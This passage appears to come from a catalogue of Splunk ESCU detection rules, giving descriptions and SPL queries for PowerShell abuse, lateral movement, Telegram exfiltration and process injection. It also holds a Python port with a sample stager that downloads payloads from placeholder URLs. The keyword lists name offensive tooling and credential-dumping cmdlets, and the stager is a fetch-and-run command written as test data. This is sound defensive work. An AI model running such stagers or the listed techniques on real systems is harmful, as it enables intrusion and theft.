| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process  IN ("*/stext *", "*/shtml *", "*/LoadPasswordsIE*", "*/LoadPasswordsFirefox*", "*/LoadPasswordsChrome*", "*/LoadPasswordsOpera*", "*/LoadPasswordsSafari*" , "*/UseOperaPasswordFile*", "*/OperaPasswordFile*","*/stab*", "*/scomma*", "*/stabular*", "*/shtml*", "*/sverhtml*", "*/sxml*", "*/skeepass*" ) AND Processes.process IN ("*\\temp\\*", "*\\users\\public\\*", "*\\programdata\\*") by Processes.action Processes.dest Processes.original_file_name Processes.parent_process Processes.parent_process_exec Processes.parent_process_guid Processes.parent_process_id Processes.parent_process_name Processes.parent_process_path Processes.process Processes.process_exec Processes.process_guid Processes.process_hash Processes.process_id Processes.process_integrity_level Processes.process_name Processes.process_path Processes.user Processes.user_id Processes.vendor_product | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `possible_browser_pass_view_parameter_filter`
Possible Lateral Movement PowerShell Spawn
The following analytic detects the spawning of a PowerShell process as a child or grandchild of commonly abused processes like services.exe, wmiprvse.exe, svchost.exe, wsmprovhost.exe, and mmc.exe. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process names, as well as command-line executions. This activity is significant as it could indicate lateral movement or remote code execution attempts by adversaries. If confirmed malicious, this behavior could allow attackers to execute code remotely, escalate privileges, or persist within the environment.
| tstats `security_content_summariesonly`
count min(_time) as firstTime
      max(_time) as lastTime
from datamodel=Endpoint.Processes where

(
    Processes.parent_process_name IN (
        "mmc.exe",
        "services.exe",
        "wmiprvse.exe",
        "wsmprovhost.exe"
    )
    OR
    (
        Processes.parent_process_name="svchost.exe"
        ```
        We exclude the "Schedule" service from the svchost.exe process. But since there are instances where it's not hosted in a dedicated svchost process, we need to exclude the hosting group "netsvcs" too
        ```
        NOT Processes.parent_process IN (
            "*-k netsvcs*",
            "*-s Schedule*",
        )
    )
)
AND
(
    Processes.process_name IN ("powershell.exe", "pwsh.exe")
    OR
    (
        Processes.process_name=cmd.exe
        Processes.process IN (
            "*powershell*",
            "*pwsh*"
        )
    )
)
NOT Processes.process IN ("*C:\\Windows\\CCM\\*")

by Processes.action Processes.dest Processes.original_file_name
   Processes.parent_process Processes.parent_process_exec
   Processes.parent_process_guid Processes.parent_process_id
   Processes.parent_process_name Processes.parent_process_path
   Processes.process Processes.process_exec Processes.process_guid
   Processes.process_hash Processes.process_id Processes.process_integrity_level
   Processes.process_name Processes.process_path Processes.user
   Processes.user_id Processes.vendor_product

| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `possible_lateral_movement_powershell_spawn_filter`
Splunk ESCU SPL T1016 ↗
Potential System Network Configuration Discovery Activity
The following analytic identifies the rapid execution of processes used for system network configuration discovery on an endpoint. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process GUIDs, names, parent processes, and command-line executions. This activity can be significant as it may indicate an attacker attempting to map the network, which is a common precursor to lateral movement or further exploitation. If confirmed malicious, this behavior could allow an attacker to gain insights into the network topology, identify critical systems, and plan subsequent attacks, potentially leading to data exfiltration or system compromise.
| tstats `security_content_summariesonly`
  count values(Processes.process) as process
        values(Processes.parent_process) as parent_process
        min(_time) as firstTime
        max(_time) as lastTime
from datamodel=Endpoint.Processes where

NOT Processes.user IN ("","unknown")

by Processes.action Processes.dest Processes.original_file_name
Processes.parent_process Processes.parent_process_exec Processes.parent_process_guid
Processes.parent_process_id Processes.parent_process_name Processes.parent_process_path
Processes.process Processes.process_exec Processes.process_guid Processes.process_hash
Processes.process_id Processes.process_integrity_level Processes.process_name Processes.process_path
Processes.user Processes.user_id Processes.vendor_product _time

| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `drop_dm_object_name(Processes)`
| search process_name IN (
          "arp.exe",
          "dsquery.exe",
          "hostname.exe",
          "ipconfig.exe",
          "nbstat.exe",
          "net.exe",
          "net1.exe",
          "nltest.exe",
          "netsh.exe",
          "nslookup.exe",
          "ping.exe",
          "quser.exe",
          "qwinsta.exe",
          "telnet.exe",
          "tracert.exe",
        )
| transaction dest connected=false maxpause=5m
| where eventcount>=5
| `potential_system_network_configuration_discovery_activity_filter`
Splunk ESCU SPL T1102.002, T1041 ↗
Potential Telegram API Request Via CommandLine
The following analytic detects the presence of "api.telegram.org" in the CommandLine of a process. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity can be significant as the telegram API has been used as an exfiltration mechanism or even as a C2 channel. If confirmed malicious, this could allow an attacker or malware to exfiltrate data or receive additional C2 instruction, potentially leading to further compromise and persistence within the network.
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes
  WHERE Processes.process= "*api.telegram.org*" NOT Processes.process IN ("*-osint -url*", "* --single-argument*")
  BY Processes.action Processes.dest Processes.original_file_name
     Processes.parent_process Processes.parent_process_exec Processes.parent_process_guid
     Processes.parent_process_id Processes.parent_process_name Processes.parent_process_path
     Processes.process Processes.process_exec Processes.process_guid
     Processes.process_hash Processes.process_id Processes.process_integrity_level
     Processes.process_name Processes.process_path Processes.user
     Processes.user_id Processes.vendor_product
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `potential_telegram_api_request_via_commandline_filter`
Splunk ESCU SPL T1078.003, T1552.001 ↗
Potential password in username
The following analytic identifies instances where users may have mistakenly entered their passwords in the username field during authentication attempts. It detects this by analyzing failed authentication events with usernames longer than 7 characters and high Shannon entropy, followed by a successful authentication from the same source to the same destination. This activity is significant as it can indicate potential security risks, such as password exposure. If confirmed malicious, attackers could exploit this to gain unauthorized access, leading to potential data breaches or further compromise of the system.
| tstats `security_content_summariesonly` earliest(_time) AS starttime latest(_time) AS endtime latest(sourcetype) AS sourcetype values(Authentication.src) AS src values(Authentication.dest) AS dest count FROM datamodel=Authentication
  WHERE nodename=Authentication.Failed_Authentication
  BY "Authentication.user"
| `drop_dm_object_name(Authentication)`
| lookup ut_shannon_lookup word AS user
| where ut_shannon>3 AND len(user)>=8 AND mvcount(src) == 1
| sort count, - ut_shannon
| eval incorrect_cred=user
| eval endtime=endtime+1000
| map maxsearches=70 search="
| tstats `security_content_summariesonly` earliest(_time) AS starttime latest(_time) AS endtime latest(sourcetype) AS sourcetype values(Authentication.src) AS src values(Authentication.dest) AS dest count FROM datamodel=Authentication
  WHERE nodename=Authentication.Successful_Authentication Authentication.src=\"$src$\" Authentication.dest=\"$dest$\" sourcetype IN (\"$sourcetype$\") earliest=\"$starttime$\" latest=\"$endtime$\" BY \"Authentication.user\"
| `drop_dm_object_name(\"Authentication\")`
| `potential_password_in_username_false_positive_reduction`
| eval incorrect_cred=\"$incorrect_cred$\"
| eval ut_shannon=\"$ut_shannon$\"
| sort count"
| where user!=incorrect_cred
| outlier action=RM count
| `potential_password_in_username_filter`
Splunk ESCU SPL T1059.001 ↗
PowerShell - Connect To Internet With Hidden Window
The following analytic detects PowerShell commands using the WindowStyle parameter to hide the window while connecting to the Internet. This behavior is identified through Endpoint Detection and Response (EDR) telemetry, focusing on command-line executions that include variations of the WindowStyle parameter. This activity is significant because it attempts to bypass default PowerShell execution policies and conceal its actions, which is often indicative of malicious intent. If confirmed malicious, this could allow an attacker to execute commands stealthily, potentially leading to unauthorized data exfiltration or further compromise of the endpoint.
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes
  WHERE `process_powershell`
  BY Processes.action Processes.dest Processes.original_file_name
     Processes.parent_process Processes.parent_process_exec Processes.parent_process_guid
     Processes.parent_process_id Processes.parent_process_name Processes.parent_process_path
     Processes.process Processes.process_exec Processes.process_guid
     Processes.process_hash Processes.process_id Processes.process_integrity_level
     Processes.process_name Processes.process_path Processes.user
     Processes.user_id Processes.vendor_product
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| where match(process,"(?i)[\-|\/|–|—|―]w(in*d*o*w*s*t*y*l*e*)*\s+[^-]")
| `powershell___connect_to_internet_with_hidden_window_filter`
Splunk ESCU SPL T1059.001 ↗
PowerShell 4104 Hunting
The following analytic identifies suspicious PowerShell execution using Script Block Logging (EventCode 4104). It leverages specific patterns and keywords within the ScriptBlockText field to detect potentially malicious activities. This detection is significant for SOC analysts as PowerShell is commonly used by attackers for various malicious purposes, including code execution, privilege escalation, and persistence. If confirmed malicious, this activity could allow attackers to execute arbitrary commands, exfiltrate data, or maintain long-term access to the compromised system, posing a severe threat to the organization's security.
`powershell` EventCode=4104
  | eval DoIt = if(match(ScriptBlockText,"(?i)(\$doit)"), "4", 0)
  | eval enccom=if(match(ScriptBlockText,"[A-Za-z0-9+\/]{44,}([A-Za-z0-9+\/]{4}|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{2}==)") OR match(ScriptBlockText, "(?i)[-]e(nc*o*d*e*d*c*o*m*m*a*n*d*)*\s+[^-]"),4,0)
  | eval suspcmdlet=if(match(ScriptBlockText, "(?i)Add-Exfiltration|Add-Persistence|Add-RegBackdoor|Add-ScrnSaveBackdoor|Check-VM|Do-Exfiltration|Enabled-DuplicateToken|Exploit-Jboss|Find-Fruit|Find-GPOLocation|Find-TrustedDocuments|Get-ApplicationHost|Get-ChromeDump|Get-ClipboardContents|Get-FoxDump|Get-GPPPassword|Get-IndexedItem|Get-Keystrokes|LSASecret|Get-PassHash|Get-RegAlwaysInstallElevated|Get-RegAutoLogon|Get-RickAstley|Get-Screenshot|Get-SecurityPackages|Get-ServiceFilePermission|Get-ServicePermission|Get-ServiceUnquoted|Get-SiteListPassword|Get-System|Get-TimedScreenshot|Get-UnattendedInstallFile|Get-Unconstrained|Get-VaultCredential|Get-VulnAutoRun|Get-VulnSchTask|Gupt-Backdoor|HTTP-Login|Install-SSP|Install-ServiceBinary|Invoke-ACLScanner|Invoke-ADSBackdoor|Invoke-ARPScan|Invoke-AllChecks|Invoke-BackdoorLNK|Invoke-BypassUAC|Invoke-CredentialInjection|Invoke-DCSync|Invoke-DllInjection|Invoke-DowngradeAccount|Invoke-EgressCheck|Invoke-Inveigh|Invoke-InveighRelay|Invoke-Mimikittenz|Invoke-NetRipper|Invoke-NinjaCopy|Invoke-PSInject|Invoke-Paranoia|Invoke-PortScan|Invoke-PoshRat|Invoke-PostExfil|Invoke-PowerDump|Invoke-PowerShellTCP|Invoke-PsExec|Invoke-PsUaCme|Invoke-ReflectivePEInjection|Invoke-ReverseDNSLookup|Invoke-RunAs|Invoke-SMBScanner|Invoke-SSHCommand|Invoke-Service|Invoke-Shellcode|Invoke-Tater|Invoke-ThunderStruck|Invoke-Token|Invoke-UserHunter|Invoke-VoiceTroll|Invoke-WScriptBypassUAC|Invoke-WinEnum|MailRaider|New-HoneyHash|Out-Minidump|Port-Scan|PowerBreach|PowerUp|PowerView|Remove-Update|Set-MacAttribute|Set-Wallpaper|Show-TargetScreen|Start-CaptureServer|VolumeShadowCopyTools|NEEEEWWW|(Computer|User)Property|CachedRDPConnection|get-net\S+|invoke-\S+hunter|Install-Service|get-\S+(credent|password)|remoteps|Kerberos.*(policy|ticket)|netfirewall|Uninstall-Windows|Verb\s+Runas|AmsiBypass|nishang|Invoke-Interceptor|EXEonRemote|NetworkRelay|PowerShelludp|PowerShellIcmp|CreateShortcut|copy-vss|invoke-dll|invoke-mass|out-shortcut|Invoke-ShellCommand"),1,0)
  | eval base64 = if(match(lower(ScriptBlockText),"frombase64"), "4", 0)
  | eval empire=if(match(lower(ScriptBlockText),"system.net.webclient") AND match(lower(ScriptBlockText), "frombase64string") ,5,0)
  | eval mimikatz=if(match(lower(ScriptBlockText),"mimikatz") OR match(lower(ScriptBlockText), "-dumpcr") OR match(lower(ScriptBlockText), "SEKURLSA::Pth") OR match(lower(ScriptBlockText), "kerberos::ptt") OR match(lower(ScriptBlockText), "kerberos::golden") ,5,0)
  | eval iex=if(match(ScriptBlockText, "(?i)iex|invoke-expression"),2,0)
  | eval webclient=if(match(lower(ScriptBlockText),"http") OR match(lower(ScriptBlockText),"web(client|request)") OR match(lower(ScriptBlockText),"socket") OR match(lower(ScriptBlockText),"download(file|string)") OR match(lower(ScriptBlockText),"bitstransfer") OR match(lower(ScriptBlockText),"internetexplorer.application") OR match(lower(ScriptBlockText),"xmlhttp"),5,0)
  | eval get = if(match(lower(ScriptBlockText),"get-"), "1", 0)
  | eval rundll32 = if(match(lower(ScriptBlockText),"rundll32"), "4", 0)
  | eval suspkeywrd=if(match(ScriptBlockText, "(?i)(bitstransfer|mimik|metasp|AssemblyBuilderAccess|Reflection\.Assembly|shellcode|injection|cnvert|shell\.application|start-process|Rc4ByteStream|System\.Security\.Cryptography|lsass\.exe|localadmin|LastLoggedOn|hijack|BackupPrivilege|ngrok|comsvcs|backdoor|brute.?force|Port.?Scan|Exfiltration|exploit|DisableRealtimeMonitoring|beacon)"),1,0)
  | eval syswow64 = if(match(lower(ScriptBlockText),"syswow64"), "3", 0)
  | eval httplocal = if(match(lower(ScriptBlockText),"http://127.0.0.1"), "4", 0)
  | eval reflection = if(match(lower(ScriptBlockText),"reflection"), "1", 0)
  | eval invokewmi=if(match(lower(ScriptBlockText), "(?i)(wmiobject|WMIMethod|RemoteWMI|PowerShellWmi|wmicommand)"),5,0)
  | eval downgrade=if(match(ScriptBlockText, "(?i)([-]ve*r*s*i*o*n*\s+2)") OR match(lower(ScriptBlockText),"powershell -version"),3,0)
  | eval compressed=if(match(ScriptBlockText, "(?i)GZipStream|::Decompress|IO.Compression|write-zip|(expand|compress)-Archive"),5,0)
  | eval invokecmd = if(match(lower(ScriptBlockText),"invoke-command"), "4", 0)
  | addtotals fieldname=Score DoIt, enccom, suspcmdlet, suspkeywrd, compressed, downgrade, mimikatz, iex, empire, rundll32, webclient, syswow64, httplocal, reflection, invokewmi, invokecmd, base64, get
  | stats values(Score)
    BY UserID, Computer, DoIt,
       enccom, compressed, downgrade,
       iex, mimikatz, rundll32,
       empire, webclient, syswow64,
       httplocal, reflection, invokewmi,
       invokecmd, base64, get,
       suspcmdlet, suspkeywrd
  | rename Computer as dest, UserID as user
  | `powershell_4104_hunting_filter`
Splunk ESCU SPL T1059.001 ↗
PowerShell Domain Enumeration
The following analytic detects the execution of PowerShell commands used for domain enumeration, such as `get-netdomaintrust` and `get-adgroupmember`. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze the full command sent to PowerShell. This activity is significant as it often indicates reconnaissance efforts by an attacker to map out the domain structure and identify key users and groups. If confirmed malicious, this behavior could lead to further targeted attacks, privilege escalation, and unauthorized access to sensitive information within the domain.
`powershell` EventCode=4104 ScriptBlockText IN (*get-netdomaintrust*, *get-netforesttrust*, *get-addomain*, *get-adgroupmember*, *get-domainuser*)
  | fillnull
  | stats count min(_time) as firstTime max(_time) as lastTime
    BY dest signature signature_id
       user_id vendor_product EventID
       Guid Opcode Name
       Path ProcessID ScriptBlockId
       ScriptBlockText
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `powershell_domain_enumeration_filter`
Splunk ESCU SPL T1059.001 ↗
PowerShell Enable PowerShell Remoting
The following analytic detects the use of the Enable-PSRemoting cmdlet, which allows PowerShell remoting on a local or remote computer. This detection leverages PowerShell Script Block Logging (EventCode 4104) to identify when this cmdlet is executed. Monitoring this activity is crucial as it can indicate an attacker enabling remote command execution capabilities on a compromised system. If confirmed malicious, this activity could allow an attacker to take control of the system remotely, execute commands, and potentially pivot to other systems within the network, leading to further compromise and lateral movement.
`powershell` EventCode=4104 ScriptBlockText="*Enable-PSRemoting*"
  | fillnull
  | stats count min(_time) as firstTime max(_time) as lastTime
    BY dest signature signature_id
       user_id vendor_product EventID
       Guid Opcode Name
       Path ProcessID ScriptBlockId
       ScriptBlockText
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `powershell_enable_powershell_remoting_filter`
Splunk ESCU SPL T1059.001 ↗
PowerShell Environment Variable Execution
The following analytic detects the execution of PowerShell scripts that combine environment variable access (`$env:` or `[Environment]::SetEnvironmentVariable`) with `Invoke-Expression` or its alias `iex` to dynamically construct and run code at runtime. This technique is commonly used by adversaries to stage and execute payloads by embedding commands or encoded content inside environment variables, then evaluating them on the fly — effectively hiding the true execution intent from static inspection. Detection is based on PowerShell Script Block Logging (Event ID 4104), which captures the de-obfuscated script block before it executes. Triggering this analytic indicates a potential attempt to execute environment-variable-stored code, a behavior observed in malware loaders and stagers, including those associated with the VIP Keylogger campaign.
`powershell`
EventCode=4104
ScriptBlockText="*$env:*"
ScriptBlockText IN (
    "*.Invoke()*",
    "*[scriptblock]::Create*",
    "*iex *",
    "*Invoke-Expression*"
)
ScriptBlockText="*[Environment]::SetEnvironmentVariable*"
| regex ScriptBlockText="(?i)((invoke-expression|iex\s+|\biex\b).*\$env:|\[scriptblock\]::create\s*\(\s*\$env:[^)]+\)\s*(?:\.\s*invoke\s*\(\s*\))?)"
| fillnull
| stats count min(_time) as firstTime max(_time) as lastTime
by dest signature signature_id user_id vendor_product EventID Guid Opcode Name Path ProcessID ScriptBlockId ScriptBlockText
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_environment_variable_execution_filter`
Splunk ESCU SPL T1069.001 ↗
PowerShell Get LocalGroup Discovery
The following analytic identifies the use of the `get-localgroup` command executed via PowerShell or cmd.exe to enumerate local groups on an endpoint. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. Monitoring this activity is significant as it may indicate an attacker attempting to gather information about local group memberships, which can be a precursor to privilege escalation. If confirmed malicious, this activity could allow an attacker to identify and target privileged accounts, potentially leading to unauthorized access and control over the system.
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes
  WHERE (
        Processes.process_name=powershell.exe
        OR
        Processes.process_name=cmd.exe
    )
    (Processes.process="*get-localgroup*")
  BY Processes.action Processes.dest Processes.original_file_name
     Processes.parent_process Processes.parent_process_exec Processes.parent_process_guid
     Processes.parent_process_id Processes.parent_process_name Processes.parent_process_path
     Processes.process Processes.process_exec Processes.process_guid
     Processes.process_hash Processes.process_id Processes.process_integrity_level
     Processes.process_name Processes.process_path Processes.user
     Processes.user_id Processes.vendor_product
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_get_localgroup_discovery_filter`
Splunk ESCU SPL T1047 ↗
PowerShell Invoke CIMMethod CIMSession
The following analytic detects the creation of a New-CIMSession cmdlet followed by the use of the Invoke-CIMMethod cmdlet within PowerShell. It leverages PowerShell Script Block Logging to identify these specific cmdlets in the ScriptBlockText field. This activity is significant because it mirrors the behavior of the Invoke-WMIMethod cmdlet, often used for remote code execution via NTLMv2 pass-the-hash authentication. If confirmed malicious, this could allow an attacker to execute commands remotely, potentially leading to unauthorized access and control over targeted systems.
`powershell` EventCode=4104 ScriptBlockText IN ("*invoke-CIMMethod*", "*New-CimSession*")
  | fillnull
  | stats count min(_time) as firstTime max(_time) as lastTime
    BY dest signature signature_id
       user_id vendor_product EventID
       Guid Opcode Name
       Path ProcessID ScriptBlockId
       ScriptBlockText
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `powershell_invoke_cimmethod_cimsession_filter`
Splunk ESCU SPL T1047 ↗
PowerShell Invoke WmiExec Usage
The following analytic detects the execution of the Invoke-WMIExec utility within PowerShell Script Block Logging (EventCode 4104). This detection leverages PowerShell script block logs to identify instances where the Invoke-WMIExec command is used. Monitoring this activity is crucial as it indicates potential lateral movement using WMI commands with NTLMv2 pass-the-hash authentication. If confirmed malicious, this activity could allow an attacker to execute commands remotely on target systems, potentially leading to further compromise and lateral spread within the network.
`powershell` EventCode=4104 ScriptBlockText IN ("*invoke-wmiexec*")
  | fillnull
  | stats count min(_time) as firstTime max(_time) as lastTime
    BY dest signature signature_id
       user_id vendor_product EventID
       Guid Opcode Name
       Path ProcessID ScriptBlockId
       ScriptBlockText
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `powershell_invoke_wmiexec_usage_filter`
Splunk ESCU SPL T1059.001 ↗
PowerShell Loading DotNET into Memory via Reflection
The following analytic detects the use of PowerShell scripts to load .NET assemblies into memory via reflection, a technique often used in malicious activities such as those by Empire and Cobalt Strike. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze the full command executed. This behavior is significant as it can indicate advanced attack techniques aiming to execute code in memory, bypassing traditional defenses. If confirmed malicious, this activity could lead to unauthorized code execution, privilege escalation, and persistent access within the environment.
`powershell` EventCode=4104
ScriptBlockText IN (
    "*.LoadFrom(*",
    "*.LoadModule(*",
    "*.LoadWithPartialName*",
    "*Reflection.Assembly.Load*",
    "*Reflection.Assembly]::('daoL'[-1..-4] -join '')*",
    "*Reflection.Assembly]::Load*",
    "*ReflectionOnlyLoad*",
    "*UnsafeLoadFrom*"
)

| fillnull
| stats count min(_time) as firstTime
              max(_time) as lastTime
  by dest signature signature_id user_id
     vendor_product EventID Guid Opcode
     Name Path ProcessID
     ScriptBlockId ScriptBlockText

| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_loading_dotnet_into_memory_via_reflection_filter`
PowerShell PInvoke Process Injection API Chain
The following analytic detects PowerShell Script Block Logging (Event ID 4104) evidence of a complete P/Invoke process-injection API chain at either the compile phase or the execution phase. Portions of this search were modified to retain the same functionality while preventing antivirus products from alerting on the detection itself.
`powershell`
EventCode=4104
ScriptBlockText="*add-type*"
ScriptBlockText="*DllImport*"
ScriptBlockText IN (
    "*extern IntPtr*",
    "*extern bool*",
    "*extern uint*",
    "*extern int*"
)
| where
    (
        match(ScriptBlockText, "(?i)[v][i][r][t][u][a][l][a][l][l][o][c]")
        AND match(ScriptBlockText, "(?i)[v][i][r][t][u][a][l][p][r][o][t][e][c][t]")
        AND match(ScriptBlockText, "(?i)[c][r][e][a][t][e][t][h][r][e][a][d]")
    )
    OR
    (
        match(ScriptBlockText, "(?i)[o][p][e][n][p][r][o][c][e][s][s]")
        AND match(ScriptBlockText, "(?i)[v][i][r][t][u][a][l][a][l][l][o][c]")
        AND match(ScriptBlockText, "(?i)[w][r][i][t][e][p][r][o][c][e][s][s][m][e][m][o][r][y]")
        AND (
            match(ScriptBlockText, "(?i)[c][r][e][a][t][e][r][e][m][o][t][e][t][h][r][e][a][d]")
            OR
            match(ScriptBlockText, "(?i)[q][u][e][u][e][u][s][e][r][a][p][c]")
        )
    )
    OR
    (
        match(ScriptBlockText, "(?i)[o][p][e][n][t][h][r][e][a][d]")
        AND match(ScriptBlockText, "(?i)[s][u][s][p][e][n][d][t][h][r][e][a][d]")
        AND match(ScriptBlockText, "(?i)[g][e][t][t][h][r][e][a][d][c][o][n][t][e][x][t]")
        AND match(ScriptBlockText, "(?i)[w][r][i][t][e][p][r][o][c][e][s][s][m][e][m][o][r][y]")
        AND match(ScriptBlockText, "(?i)[s][e][t][t][h][r][e][a][d][c][o][n][t][e][x][t]")
        AND match(ScriptBlockText, "(?i)[r][e][s][u][m][e][t][h][r][e][a][d]")
    )
    OR
    (
        match(ScriptBlockText, "(?i)[c][r][e][a][t][e][p][r][o][c][e][s][s]")
        AND match(ScriptBlockText, "(?i)[v][i][r][t][u][a][l][a][l][l][o][c]")
        AND match(ScriptBlockText, "(?i)[w][r][i][t][e][p][r][o][c][e][s][s][m][e][m][o][r][y]")
        AND match(ScriptBlockText, "(?i)[s][e][t][t][h][r][e][a][d][c][o][n][t][e][x][t]")
        AND ScriptBlockText = "*ResumeThread*"
    )
    OR
    (
        match(ScriptBlockText, "(?i)[n][t][c][r][e][a][t][e][s][e][c][t][i][o][n]")
        AND match(ScriptBlockText, "(?i)[n][t][m][a][p][v][i][e][w][o][f][s][e][c][t][i][o][n]")
        AND match(ScriptBlockText, "(?i)[c][r][e][a][t][e][r][e][m][o][t][e][t][h][r][e][a][d]")
    )
| fillnull
| stats count min(_time) as firstTime
              max(_time) as lastTime
   by dest signature signature_id user_id vendor_product EventID
      Guid Opcode Name Path ProcessID ScriptBlockId ScriptBlockText
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_pinvoke_process_injection_api_chain_filter`
Splunk ESCU SPL T1059.001, T1105 ↗
PowerShell Script Block With URL Chain
The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that contains multiple URLs within a function or array. It leverages PowerShell operational logs to detect script blocks with embedded URLs, often indicative of obfuscated scripts or those attempting to download secondary payloads. This activity is significant as it may signal an attempt to execute malicious code or download additional malware. If confirmed malicious, this could lead to code execution, further system compromise, or data exfiltration. Review parallel processes and the full script block for additional context and related artifacts.
Show query
`powershell` EventCode=4104 ScriptBlockText IN ("*http:*","*https:*") | regex ScriptBlockText="(\"?(https?:\/\/(?:www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b(?:[-a-zA-Z0-9()@:%_\+.~#?&\/=]*))\"?(?:,|\))?){2,}" | rex max_match=20 field=ScriptBlockText "(?<url>https?:\/\/(?:www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b(?:[-a-zA-Z0-9()@:%_\+.~#?&\/=]*))" | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by dest signature signature_id user_id vendor_product EventID Guid Opcode Name Path ProcessID ScriptBlockId ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `powershell_script_block_with_url_chain_filter`
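The detection has two stages: a `regex` stage that only keeps blocks containing two or more URLs back to back (each optionally quoted and followed by `,` or `)`), and a `rex` stage that extracts up to 20 of them. This Python port is an added example, not ESCU code; the URL pattern is copied from the query, and the three script blocks are constructed for illustration.

```python
import re

# URL pattern copied from the detection; CHAIN_RE is its `regex` stage.
URL = (r"https?://(?:www\.)?[-a-zA-Z0-9@:%._+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b"
       r"(?:[-a-zA-Z0-9()@:%_+.~#?&/=]*)")
URL_RE = re.compile(URL)
CHAIN_RE = re.compile(r'("?(?:' + URL + r')"?(?:,|\))?){2,}')
MAX_MATCH = 20   # mirrors `rex max_match=20`


def extract_urls(script_block: str) -> list[str]:
    """The `rex` stage: up to MAX_MATCH URLs found anywhere in the block."""
    return URL_RE.findall(script_block)[:MAX_MATCH]


def is_url_chain(script_block: str) -> bool:
    """True when the block passes both the base search (any http:/https:)
    and the `regex` stage (two or more adjacent URLs)."""
    if not re.search(r"https?:", script_block, re.IGNORECASE):
        return False
    return CHAIN_RE.search(script_block) is not None


# Constructed script blocks (not real telemetry).
# A stager that walks a list of fallback payload URLs: fires.
STAGER = ('$urls = @("https://cdn.example.net/a.dat","https://mirror.example.org/b.dat",'
          '"https://fallback.example.com/c.dat")\n'
          'foreach ($u in $urls) { try { (New-Object Net.WebClient).DownloadString($u); break } catch {} }')
# One download URL: extracted, but no chain.
SINGLE = 'Invoke-WebRequest -Uri "https://updates.example.com/setup.exe" -OutFile setup.exe'
# Same idea as STAGER, but with a space after the comma.
SPACED = '$urls = @("https://cdn.example.net/a.dat", "https://mirror.example.org/b.dat")'
```

The chain pattern is strictly about adjacency: `SPACED` contains two URLs, and `extract_urls` returns both, but the space after the comma breaks the `{2,}` repetition, so `is_url_chain` is false and the block never reaches `stats`. If you want the rule to tolerate PowerShell's usual `"a", "b"` formatting, allow `\s*` after the separator in the `regex` stage (at the cost of a few more benign hits from scripts that list documentation links).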
Splunk ESCU SPL T1059.001 ↗
PowerShell Start or Stop Service
The following analytic identifies the use of PowerShell's Start-Service or Stop-Service cmdlets on an endpoint. It leverages PowerShell Script Block Logging to detect these commands. This activity is significant because attackers can manipulate services to disable or stop critical functions, causing system instability or disrupting business operations. If confirmed malicious, this behavior could allow attackers to disable security services, evade detection, or disrupt essential services, leading to potential system downtime and compromised security.
Show query
`powershell` EventCode=4104 ScriptBlockText IN ("*start-service*", "*stop-service*")
  | fillnull
  | stats count min(_time) as firstTime max(_time) as lastTime
    BY dest signature signature_id
       user_id vendor_product EventID
       Guid Opcode Name
       Path ProcessID ScriptBlockId
       ScriptBlockText
  | `security_content_ctime(firstTime)`
  | `security_content_ctime(lastTime)`
  | `powershell_start_or_stop_service_filter`
Splunk ESCU SPL T1197 ↗
PowerShell Start-BitsTransfer
The following analytic detects the execution of the PowerShell command `Start-BitsTransfer`, which can be used for file transfers, including potential data exfiltration. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events and command-line arguments. This activity is significant because `Start-BitsTransfer` can be abused by adversaries to upload sensitive files to remote locations, posing a risk of data loss. If confirmed malicious, this could lead to unauthorized data exfiltration, compromising sensitive information and potentially leading to further exploitation of the network.
Show query
| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes
  WHERE `process_powershell` Processes.process=*start-bitstransfer*
  BY Processes.action Processes.dest Processes.original_file_name
     Processes.parent_process Processes.parent_process_exec Processes.parent_process_guid
     Processes.parent_process_id Processes.parent_process_name Processes.parent_process_path
     Processes.process Processes.process_exec Processes.process_guid
     Processes.process_hash Processes.process_id Processes.process_integrity_level
     Processes.process_name Processes.process_path Processes.user
     Processes.user_id Processes.vendor_product
| `drop_dm_object_name(Processes)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| `powershell_start_bitstransfer_filter`
PowerShell WebRequest Using Memory Stream
